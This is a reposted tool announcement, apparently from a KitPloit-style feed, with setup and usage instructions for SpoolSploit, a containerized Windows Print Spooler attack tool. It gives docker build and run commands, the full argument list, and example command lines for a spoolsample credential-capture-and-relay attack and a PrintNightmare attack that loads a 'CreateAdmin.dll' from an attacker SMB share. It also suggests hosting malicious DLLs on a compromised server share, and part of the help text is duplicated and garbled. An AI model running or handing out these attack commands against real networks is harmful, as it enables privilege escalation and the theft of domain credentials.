2021-10-07 14:33:23
Getting Started
As of the release date the SpoolSploit Docker container (https://www.kitploit.com/search/label/Container) has been tested successfully on the latest versions of MacOS, Ubuntu Linux, and Windows 10.Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine (https://www.kitploit.com/search/label/Virtual%20Machine) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.
Create and access the SpoolSploit Docker container
Clone this repositorygit clone https://github.com/BeetleChunks/SpoolSploit
Build the SpoolSploit Docker container imagecd SpoolSploit
sudo docker build -t spoolsploit .
Create and start the SpoolSploit Docker containersudo docker run -dit -p 445:445
name spoolsploit spoolsploit:latest
Attach to the containersudo docker exec -it spoolsploit /bin/bash
Command-line Usage
) -rP {139,445}, rport {139,445} Remote SMB server port. -lH LHOST,
lhost LHOST Listening hostname or IP -lS LSHARE, lshare LSHARE Staging SMB share (UNC) -d DOMAIN,
domain DOMAIN Domain for authentication -u USER, username USER Username for authentication -p PASSWD,
password PASSWD Password for authentication Example - spoolsample: python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 Example - nightmare: python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 ">usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD
optional arguments:
-h, help show this help message and exit
-a {spoolsample,nightmare},
attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, rhost RHOST
Remote target IP, CIDR range, or filename (file:)
-rP {139,445},
rport {139,445}
Remote SMB server port.
-lH LHOST, lhost LHOST
Listening hostname or IP
-lS LSHARE,
lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, domain DOMAIN
Domain for authentication
-u USER,
username USER
Username for authentication
-p PASSWD, password PASSWD
Password for authentication
Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
SpoolSample - Capture and relay Windows machine account credentials
The SpoolSploit Docker container includes Responder (https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.
3 viewsChannel Automatic NS bot, 11:33